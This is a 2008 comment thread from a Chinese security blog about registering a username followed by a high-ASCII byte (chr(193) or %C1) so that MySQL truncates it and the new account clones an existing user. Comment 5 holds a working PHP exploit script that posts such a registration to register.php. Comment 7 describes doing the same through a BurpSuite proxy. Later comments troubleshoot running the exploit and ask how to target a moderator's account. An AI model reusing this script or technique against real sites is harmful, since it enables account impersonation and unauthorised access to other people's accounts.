鬼仔's Blog

楼被抢了 13 层了... 抢座、Rss 2.0或者 Trackback

1. 
   v 2008/06/02 18:25 #1

   漏洞原因是Mysql会舍弃没有用处的ASCII129-255

2. 
   Black-Xstar 2008/06/02 18:34 #2

   终于看懂了这个漏洞的原理……

3. 
   wildboy 2008/06/02 20:59 #3

   提交表单的代码应该把"改成'吧
   把 print <<<EOT

   EOT;
   改成
   print "

   ";

4. 
   yezi 2008/06/03 9:11 #4

   HTTP/Client.php

   这个是啥子文件哦？貌似某提供嘛
   能否提供下?

5. 
   yezi 2008/06/03 9:17 #5

   搞定了client
   但是还是报错
   Fatal error: Class 'HTTP_Client' not found in e:\wwwroot\yezi\wwwroot\blog\upload\php4.php on line 27

   <?php
   if (empty($_GET['sub'])) {
   print <<<EOT

   EOT;
   } else {
   extract($_GET);
   $regname .= chr(193);
   $data = array(
   'regname' => $regname,
   'regpwd' => 147852,
   'regpwdrepeat' => 147852,
   'regemail' => 'llll@Ll.com',
   'regemailtoall' => 1,
   'step' => 2
   );

   $url .= '/register.php';
   $includePath = ini_get('include_path');
   $includePath .=';e:\wwwroot\yezi\wwwroot\blog\upload';
   ini_set('include_path', $includePath);
   include('Client.php');
   $http = new HTTP_Client();
   var_dump($http->post($url, $data));
   }
   ?>

6. 
   yezi 2008/06/03 9:36 #6

   可以提交了
   string(3) "400" Array

   。。。
   但是还是无法登陆呀！

7. 
   vertusd 2008/06/03 19:21 #7

   我没用这个PHP脚本或是POTHON，直接用浏览器代理拦截 ，修改POST数据 ，然后在注册名后加%C11。
   最新版的，可以用UID登陆，但是，大部分前台权限都没有，但是版务管理可以看到，点击后却说你没有权限，但FTP流量，等插件里面确实是被克隆的人。

8. 
   vertus 2008/06/03 20:04 #8

   yezi ，他那个PHP我也试了的，需要用PEAR的 HTTP_CLIENT这个组件，我是在本机架设，然后用PEAR.BAT下载安装这个组件，但是注册的页面有认证码，所以这个是没有用的，只能用浏览器代理了

9. 
   sunny520 2008/06/03 23:42 #9

   vertusd,你那个可以修改post数据的浏览器是什么浏览器呢

10. 
    sunny520 2008/06/04 1:44 #10

    测试完了
    前台基本上没什么权限

11. 
    vertusd 2008/06/04 9:16 #11

    用的BURPSUITE

12. 
    大叔 2008/08/02 17:04 #12

    请问一下
    两个可填写区域里面
    上面一个写网站地址
    下面一个写版主的用户名
    提交的时候出现 int(200)

    请朋友们帮忙分析一下

    成功的兄弟加我 150019690
    大家探讨一下

13. 
    neverm0re 2008/08/30 8:55 #13

    请问下,注册成功如何用uid登陆?不清楚自己uid啊.我是用的winexpert抓包,另外发出去的